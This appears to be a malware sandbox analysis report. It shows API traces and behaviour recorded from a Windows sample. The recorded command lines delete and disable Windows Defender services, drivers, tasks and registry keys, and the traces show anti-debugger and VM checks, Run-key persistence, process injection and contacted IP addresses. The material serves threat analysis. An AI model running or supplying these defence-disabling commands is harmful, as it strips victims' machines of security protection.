description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000101
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000101
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000101
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1
2 0
cmdline reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
cmdline sc delete "MsSecCore"
cmdline sc delete "wscsvc"
cmdline reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
cmdline sc config "WdFilter" start= disabled
cmdline sc delete "WinDefend"
cmdline reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
cmdline sc stop "WdFilter"
cmdline reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
cmdline sc delete "WdNisSvc"
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
cmdline sc stop "SgrmAgent"
cmdline NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat
cmdline reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
cmdline C:\Users\test22\AppData\Local\Temp\34.bat
cmdline reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
cmdline tasklist
cmdline sc stop "webthreatdefsvc"
cmdline reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
cmdline reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
cmdline sc stop "MsSecWfp"
cmdline reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
cmdline reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
cmdline reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
cmdline reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
cmdline schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
cmdline sc config "Sense" start= disabled
cmdline reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
cmdline sc delete "WdNisDrv"
cmdline reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
cmdline reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
cmdline sc config "MsSecCore" start= disabled
cmdline sc config "webthreatdefsvc" start= disabled
cmdline sc delete "WdBoot"
cmdline sc stop "SgrmBroker"
cmdline sc config "WdBoot" start= disabled
cmdline reg query "HKU\S-1-5-19"
cmdline sc config "SgrmAgent" start= disabled
cmdline sc delete "Sense"
cmdline reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
cmdline C:\Windows\system32\cmd.exe /c tasklist
cmdline sc stop "WdBoot"
cmdline reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
cmdline reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
cmdline sc stop "MsSecCore"
cmdline reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
cmdline reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
cmdline sc delete "SecurityHealthService"
host 185.156.72.96
host 80.64.18.219
host 80.64.18.63
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x0000000000337330
service_name: None
control_code: 1
0 0

ControlService

service_handle: 0x0000000000197320
service_name: None
control_code: 1
0 0
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\2d05347e68.exe reg_value C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file C:\Windows\Tasks\ramez.job
file C:\Windows\Tasks\taren.job
file C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Time & API Arguments Status Return Repeated

CryptHashData

buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000020712e0
flags: 0
1 1 0

CryptHashData

buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000020712e0
flags: 0
1 1 0

CryptHashData

buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000020712e0
flags: 0
1 1 0

CryptHashData

buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000020712e0
flags: 0
1 1 0

CryptHashData

buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000020712e0
flags: 0
1 1 0
Process injection Process 2792 resumed a thread in remote process 2904
Process injection Process 2256 resumed a thread in remote process 2356
Process injection Process 2356 resumed a thread in remote process 2748
Process injection Process 4184 resumed a thread in remote process 4272
Process injection Process 4608 resumed a thread in remote process 4692
Process injection Process 4692 resumed a thread in remote process 4836
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000138
suspend_count: 0
process_identifier: 2904
1 0 0

NtResumeThread

thread_handle: 0x000000000000014c
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x0000000000000074
suspend_count: 0
process_identifier: 2748
1 0 0

NtResumeThread

thread_handle: 0x00000138
suspend_count: 0
process_identifier: 4272
1 0 0

NtResumeThread

thread_handle: 0x000000000000014c
suspend_count: 1
process_identifier: 4692
1 0 0

NtResumeThread

thread_handle: 0x0000000000000074
suspend_count: 0
process_identifier: 4836
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 14 24 50 89 24 24
exception.symbol: 3v57i+0x1e4cc4
exception.instruction: in eax, dx
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1985732
exception.address: 0xb04cc4
registers.esp: 1571408
registers.edi: 1114345
registers.eax: 1447909480
registers.ebp: 3999985684
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 11534730
registers.ecx: 20
1 0 0
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

ordinal: 0
function_address: 0x00e5f7a8
function_name: wine_get_version
module: ntdll
module_address: 0x76f10000
3221225785 0

LdrGetProcedureAddress

ordinal: 0
function_address: 0x002f17dc
function_name: wine_get_version
module: ntdll
module_address: 0x76f10000
3221225785 0